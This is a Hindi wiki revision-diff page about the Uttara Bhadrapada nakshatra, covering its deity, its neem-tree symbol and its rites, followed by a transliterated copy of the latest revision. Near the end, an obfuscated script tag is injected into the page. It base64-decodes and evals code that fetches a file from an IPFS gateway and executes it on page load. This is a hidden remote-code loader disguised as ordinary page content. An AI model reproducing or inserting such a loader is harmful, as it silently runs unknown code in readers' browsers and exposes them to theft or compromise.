Difference between revisions of "उत्तरा भाद्रपद नक्षत्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खाली" to "ख़ाली")
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
उत्तरा भाद्रपद आकाश मंडल में 26वाँ [[नक्षत्र]] है। उत्तरा भाद्रपद में मांस का दान करने का नियम है।
 
<poem>अर्थ - बाद का सुन्दर पग
 
<poem>अर्थ - बाद का सुन्दर पग
 
देव - अहिर बुध्नया</poem>
 
देव - अहिर बुध्नया</poem>
*उत्तरा भाद्रपद आकाश मंडल में 26वाँ [[नक्षत्र]] है।
 
*उत्तरा भाद्रपद में मांस का दान करने का नियम है।
 
 
*उत्तरा भाद्रपद में अहिर्बुध्य का व्रत और पूजन किया जाता है।
 
*उत्तरा भाद्रपद में अहिर्बुध्य का व्रत और पूजन किया जाता है।
*उत्तरा भाद्रपदा नक्षत्र के [[देवता]] शनि को माना जाता है।  
+
*उत्तरा भाद्रपदा नक्षत्र के [[देवता]] [[शनि देव|शनि]] को माना जाता है।  
*[[नीम]] के पेड  को उत्तर भाद्रपदा नक्षत्र का प्रतीक माना जाता है और उत्तर भाद्रपदा नक्षत्र में जन्म लेने वाले लोग नीम के पेड की पूजा करते है।
+
*[[नीम]] के पेड  को उत्तर भाद्रपदा नक्षत्र का प्रतीक माना जाता है और उत्तर भाद्रपदा नक्षत्र में जन्म लेने वाले लोग नीम के पेड की पूजा करते हैं। 
*इस नक्षत्र में जन्म लेने वाले लोग अपने घर के ख़ाली हिस्से में नीम के पेड को लगाते है।  
+
*इस नक्षत्र में जन्म लेने वाले लोग अपने घर के ख़ाली हिस्से में [[नीम]] के पेड को लगाते हैं।  
  
{{प्रचार}}
+
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{नक्षत्र}}
 
{{नक्षत्र}}
{{काल गणना}}
 
 
[[Category:ग्रह-नक्षत्र ज्योतिष]]
 
[[Category:ग्रह-नक्षत्र ज्योतिष]]
 
[[Category:पौराणिक_कोश]]
 
[[Category:पौराणिक_कोश]]
[[Category:नया पन्ना]]
+
[[Category:काल गणना]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:25, 27 July 2012

uttara bhadrapad akash mandal mean 26vaan nakshatr hai. uttara bhadrapad mean maans ka dan karane ka niyam hai.

arth - bad ka sundar pag
dev - ahir budhnaya

  • uttara bhadrapad mean ahirbudhy ka vrat aur poojan kiya jata hai.
  • uttara bhadrapada nakshatr ke devata shani ko mana jata hai.
  • nim ke ped ko uttar bhadrapada nakshatr ka pratik mana jata hai aur uttar bhadrapada nakshatr mean janm lene vale log nim ke ped ki pooja karate haian.
  • is nakshatr mean janm lene vale log apane ghar ke khali hisse mean nim ke ped ko lagate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh